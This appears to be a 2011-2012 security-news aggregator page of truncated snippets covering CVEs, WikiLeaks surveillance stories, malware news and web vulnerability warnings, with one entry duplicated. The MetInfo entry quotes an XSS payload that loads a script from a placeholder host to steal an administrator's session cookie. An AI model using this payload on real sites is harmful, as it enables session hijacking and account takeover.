Browser Find toolbar phishing attack

Added: 02/25/2012 Background This tool serves a page claiming to be a list of stolen passwords. When a user sees this list, the most common response is to validate the claim by opening a Find box Ctrl-F and searching for his or her own password. The tool intercepts the Ctrl-F keypress and opens a...

Google to Stop Using Online CRL Checks for Chrome

In the face of mounting evidence that the CA system is inherently flawed, Google officials are in the process of making changes to the way Chrome handles certificate revocations, and no longer will be using online revocation checks. Instead, Chrome will use the existing update system in the brows...

Julian Assange interview on Spy Files

Julian Assange interview on Spy Files "Give me liberty or give me death" is a statement made famous by Patrick Henry but could easily have been stated by the new patriot of justice, Julian Assange. Julian Assange is a journalist and activist best known as the founder and public face of WikiLeaks,...

CVE-2011-4849

The Control Panel in Parallels Plesk Panel 10.4.4build20111103.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies used by help.php a...

CVE-2011-4728

The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...

FTPS Cleartext Fallback Security Bypass

The remote FTPS server running on the remote host is affected by a security bypass vulnerability due to accepting unencrypted commands if SSL negotiations fail. A man-in-the-middle attacker can exploit this to intercept credentials and modify files. C Tenable Network Security, Inc...

The Spy Files: Wikileaks expose Mobile Phone, Email Hacking capability

The Spy Files: Wikileaks expose Mobile Phone, Email Hacking capability Wikileaks has released https://spyfiles.org/ dozens of new documents highlighting the state of the once covert, but now lucrative private sector global surveillance industry. According to Assange, over 150 private sector...

webERP 4.3.8 - reportwriterFormMaker.php?ReportID SQL Injection

webERP 4.3.8 - reportwriterFormMaker.php?ReportID SQL Injection source: https://www.securityfocus.com/bid/50713/info webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may...

Israeli Military, Intelligence Sites Down After Threat by Anonymous

The Websites of Israel’s Mossad and Shinbet intelligence services as well as the Israel Defense Forces IDF site were knocked offline today following a Nov. 4 threat by Anonymous. However, members of the group may not be to blame. On Nov. 4, members of Anonymous threatened a cyber-attack in...

DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

Affected versions: DEDECMS full version The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...

Debian: Security Advisory (DSA-2311-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation

Trustwave's SpiderLabs Security Advisory TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt Published: 2011-09-23 Version: 1.0 Vendor: Pantech http://www.pantechusa.com Product: Link P7040P, others may be vulnerab...

Variant of SpyEye Targets Android Devices

Researchers at security firm Trusteer claim a new version of the SpyEye Trojan horse program that targets mobile banking users with Android mobile phones and intercepts SMS text messages to and from the phone. However, significant obstacles may prevent it from spreading. Writing on the company’s...

Phone Hacker Forced to Disclose name, Who Told Him to Hack !

Phone Hacker Forced to Disclose name, Who Told Him to Hack ! Court tells private investigator he must identify 'News of the World' executives who asked him to intercept voicemails. A private detective jailed for illegally intercepting voice-mail messages on behalf of a journalist at one of Rupert...

Phone Hacker Forced to Disclose name, Who Told Him to Hack !

Phone Hacker Forced to Disclose name, Who Told Him to Hack ! Court tells private investigator he must identify 'News of the World' executives who asked him to intercept voicemails. A private detective jailed for illegally intercepting voice-mail messages on behalf of a journalist at one of Rupert...

The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net

Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...

Indian Govt wants monitoring access for Twitter, Facebook,Skype and Google

Indian Govt wants monitoring access for Twitter, Facebook,Skype and Google India's authorities are already forcing Research In Motion to grant access to the encrypted email and instant messages of its BlackBerry users, and now the government is pressuring Google and Skype too. Doesn't the...

Yahoo Mail - Cross Site Scripting & Webfilter Bypass

Document Title: =============== Yahoo Mail - Cross Site Scripting & Webfilter Bypass Release Date: ============= 2011-06-29 Vulnerability Laboratory ID VL-ID: ==================================== 130 Product & Service Introduction: =============================== Enjoy tons of features and fun wa...

Sniffjoke 0.4.1 - Anti-sniffing Framework & Tool For Session Scrambling

Sniffjoke 0.4.1 - Anti-sniffing Framework & Tool For Session Scrambling SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifying and injecting fake packets inside your transmission, make them almost impossible to be correctly read by a passive...

Vulnerability in Google ClientLogin Protocol !

Vulnerability in Google ClientLogin Protocol ! A group of security and privacy researchers from the Institute of Media Informatics at Ulm University in Germany, is claiming to have discovered a serious security vulnerability in Google's ClientLogin protocol. In a recent analysis of the Android...